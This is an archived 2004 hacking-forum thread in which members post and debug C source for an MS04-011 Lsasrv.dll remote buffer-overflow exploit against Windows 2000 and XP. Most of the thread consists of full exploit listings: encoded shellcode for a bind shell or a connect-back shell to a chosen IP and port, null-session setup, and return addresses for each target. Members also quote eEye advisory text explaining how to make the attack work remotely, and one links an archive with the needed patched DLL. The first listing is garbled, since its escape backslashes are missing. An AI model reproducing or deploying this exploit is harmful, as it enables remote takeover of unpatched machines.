hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
SlashZero
Apr 25 2004, 03:26 PM
CODE
/******************************************************************
* Windows Lsasrv.dll RPC Remote Exploit
* [MS04-011]
*
* Bug found by: eEye (CoOL!!! :)
*
* Author: mslug (a1476854#hotmail.com), All rights reserved.
*
* Version: 0.2
*
* Tested: Win2k pro en sp4
*
* Compile: cl winlsass.c
*
* Date: 22 Apr 2004
*******************************************************************/

#include <windows.h>

/* from www.cnhonker.com */
unsigned char scode[] =
// decode
"xEBx10x5Fx4fx33xC9x66xB9x7Dx01x80x34x0Fx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
// shellcode
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x99xACxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";


#define call_ebx 0x78542001 //lsasrv.dll

int WINAPI (*DsRoleUpgradeDownlevelServer)
(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD,
DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);

#define LEN 10000

char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2000];
char target2[200];

int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret;
int i;
char c, *target;

if (argc < 2) {
printf("%s <target_host>", argv[0]);
return 0;
}

target = argv[1];

hNetapi = LoadLibrary("myNetapi.dll");
if (!hNetapi) {
printf("[-] Can't load myNetapi32.dll.n");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("[-] Can't find function.n");
exit(0);
}

memset(buf, 'x90', LEN);

memcpy(&buf[2840], "xebx06xebx06", 4);
*(DWORD *)&buf[2844] = call_ebx;
memcpy(&buf[2856], scode, strlen(scode));

for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf;
sendbuf[i*2+1] = 0;
}

memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target;
target2[i*2+1] = 0;
}


memset(buf2, 0, 2000);

DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

return 0;
}


have fun smile.gif

edit:
to be clear i didn't test it yet.. nor i know if its fake.. i just poested it so the ones who know about C very good can verify
Nostremato
Apr 25 2004, 03:44 PM
i got many errors with cygwin
agathos
Apr 25 2004, 03:46 PM
fake for me
brOmstar
Apr 25 2004, 03:50 PM
<-- think the same...
andysolaris
Apr 25 2004, 03:51 PM
Err Err Err ... sad.gif
brOmstar
Apr 25 2004, 03:59 PM
this one is public on cnhonker

CODE
#include <windows.h>
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")


/* from www.cnhonker.com */

unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";



unsigned char scode2[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";



typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define LEN 3500

char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];

int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;
LPSTR hostipc[40];
NETRESOURCE netResource;
unsigned short port;
unsigned long ip;
unsigned char* sc;

if (argc < 3) {
printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \
bug discoveried by eEye,\n \
code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.1\n \
Usage: \n \
%s 0 targetip (Port ConnectBackIP ) \
----> attack 2k (tested on cn sp4,en sp4)\n \
%s 1 targetip (Port ConnectBackIP ) \
----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
printf("");
return 0;
}

target = argv[2];
sprintf((char *)hostipc,"\\\\%s\\ipc$",target);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;



ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
printf("Create NULL session failed\n");
// return 1;
}


hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("Can't find function.\n");
exit(0);
}

memset(buf, '\x90', LEN);



if(argc>4)
{

port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;

memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
}
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);

}
sc=scode2;
}
//attack all 2k sp3 version

memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
memcpy(&buf[2036], sc, strlen(sc));

//attack all 2k sp4 version
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844],"\x2b\x38\x03\x78",4);

memcpy(&buf[2856], sc, strlen(sc));


printf("shellcode size %d\n", strlen(sc));


for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;

if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
memcpy(&sendbuf[1980], "\xeb\xde",2);
}

memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}




memset(buf2, 0, 2);
ret=0;
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

printf("Ret value = %d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hNetapi);

return 0;
}
Pro21
Apr 25 2004, 04:07 PM
yes impossible to compile.
i think it s better to start of the local exploit, this is maybe a fake !!! :@
DaClueless
Apr 25 2004, 04:25 PM
Got it to complile, but it is not working.
pita
Apr 25 2004, 05:06 PM
mmm maybe those little explanation shall be usefull:

(from eeye advisories http://www.eeye.com/html/Research/Advisori...D20040413C.html )
CODE

There is no parameter to specify the remote host for the
DsRoleUpgradeDownlevelServer() client API. The API specifies the host as NULL
internally, so the DCE/RPC request will be sent to LSASS.EXE running on the local computer.

ok so in a first approach we cant exploite remotely this vuln... so bad sad.gif

but read the advisories
CODE

We also can craft this DCE/RPC packet if we modify the instructions of DsRoleUpgradeDownlevelServer() client API. The first argument for DsRolepEncryptPasswordStart() API which is used in DsRoleUpgradeDownlevelServer() API internally is the remote host. In this case, NULL is specified for the first argument. So, if we can change this to the pointer which is stored the remote host, we can send DCE/RPC request for DsRoleUpgradeDownlevelServer() function.

In order to modify the DsRoleUpgradeDownlevelServer() API, the protections on a region of this API implemented in NETAPI32.DLL must be changed to PAGE_EXECUTE_READWRITE using the VirtualProtect() API. The following code changes will allow the remote host to be specified as the 9th parameter (szUnknown2) of the DsRoleUpgradeDownlevelServer() API.


ok so we need to modify DsRoleUpgradeDownlevelServer() API.
seems to be interesting so ok take a look at the exploit:

DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

as u see the 9th parameter is the target ip. ok all is good but... where is the new api?
hNetapi = LoadLibrary("sbaaNetapi.dll");

mmm ok so sbaa make a new api but its not in the exploit.

so from what i understand we need to make the new api (sbaanetapi.dll in this case is the dll with the new api) to get the exploit working.


Pro21
Apr 25 2004, 05:10 PM
very nice argumentation pita but it s more difficult to write a new api tongue.gif
Enjoys the knowledge smile.gif
DaClueless
Apr 25 2004, 05:11 PM
got it to work.. but only LOCALLY sad.gif
The Storm
Apr 25 2004, 05:26 PM
how to scan for this? does anybody know would be wonderfull!
Gurou
Apr 25 2004, 05:35 PM
not fake for me
brOmstar
Apr 25 2004, 05:59 PM
somebody here is fit enough to give some hints about modifying the netapi.dll ?

because i think that pita is absolute right..

CODE
The DsRoleUpgradeDownlevelServer() client API which issues the DCE/RPC request is implemented in NETAPI32.DLL. This is an undocumented API. If we specify a long szDomainName, LSASS.EXE -- which provides the Active Directory service functions running on the local computer -- will crash. This type of attack can be performed against the local machine for the purpose of privilege escalation.

There is no parameter to specify the remote host for the DsRoleUpgradeDownlevelServer() client API. The API specifies the host as NULL internally, so the DCE/RPC request will be sent to LSASS.EXE running on the local computer. However, the function called from LSASS.EXE does not check whether the request is sent from the local machine or a remote one, so it will also handle requests sent from remote hosts. So, if we craft this DCE/RPC packet by hand, or if we modify the client API to be able to specify remote host, then we can cause a buffer overflow on an arbitrary remote host running Windows 2000 or Windows XP.

Because the Active Directory services interface is registered on the LSASS named pipe RPC endpoint (ncacn_np:host[\PIPE\LSARPC]), it is sufficient to use CreateFile() and ReadFile(), WriteFile(), and/or TransactNamedPipe() in order to communicate with LSASS.EXE on the vulnerable host. No SMB knowledge is necessary, just an RPC bind and a DsRoleUpgradeDownlevelServer() packet.

We also can craft this DCE/RPC packet if we modify the instructions of DsRoleUpgradeDownlevelServer() client API. The first argument for DsRolepEncryptPasswordStart() API which is used in DsRoleUpgradeDownlevelServer() API internally is the remote host. In this case, NULL is specified for the first argument. So, if we can change this to the pointer which is stored the remote host, we can send DCE/RPC request for DsRoleUpgradeDownlevelServer() function.

In order to modify the DsRoleUpgradeDownlevelServer() API, the protections on a region of this API implemented in NETAPI32.DLL must be changed to PAGE_EXECUTE_READWRITE using the VirtualProtect() API. The following code changes will allow the remote host to be specified as the 9th parameter (szUnknown2) of the DsRoleUpgradeDownlevelServer() API.

In case of Windows 2000, we should specify the DomainName as Unicode; on Windows XP, we should use ASCII. We can execute about 2KB of code on the remote host using this buffer overflow.
isaiah
Apr 27 2004, 01:39 PM
CODE


// Comments from K-OTik.COM : to make this exploit work remotely you have to use the
// sbaaNetapi.dll wich modifies the DsRoleUpgradeDownlevelServer API, this will allow
// the remote host to be specified as explained on eeye advisory...
//
// http://www.k-otik.com/exploits/04252004.ms04011lsass.rar


#include <windows.h>
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")

unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";



unsigned char scode2[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";



typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define LEN 3500

char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];

int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;
LPSTR hostipc[40];
NETRESOURCE netResource;
unsigned short port;
unsigned long ip;
unsigned char* sc;

if (argc < 3) {
printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \bug discoveried by eEye,\n \
code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\n \
Usage: \n \
%s 0 targetip (Port ConnectBackIP ) \
----> attack 2k (tested on cn sp4,en sp4)\n \
%s 1 targetip (Port ConnectBackIP ) \
----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
printf("");
return 0;
}

target = argv[2];
sprintf((char *)hostipc,"\\\\%s\\ipc$",target);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;



ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
printf("Create NULL session failed\n");
// return 1;
}


hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("Can't find function.\n");
exit(0);
}

memset(buf, '\x90', LEN);



if(argc>4)
{

port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;

memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
}
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);

}
sc=scode2;
}
//attack all 2k sp3 version

memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
memcpy(&buf[2036], sc, strlen(sc));

//attack all 2k sp4 version
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844],"\x2b\x38\x03\x78",4);

memcpy(&buf[2856], sc, strlen(sc));


printf("shellcode size %d\n", strlen(sc));


for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;

if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
memcpy(&sendbuf[1980], "\xeb\xde",2);
}
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2);
ret=0;
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

printf("Ret value = %d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hNetapi);

return 0;
}


thast a new code and it gives that file thats needed
gogu258
May 8 2004, 11:31 AM
It's dead anyway.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.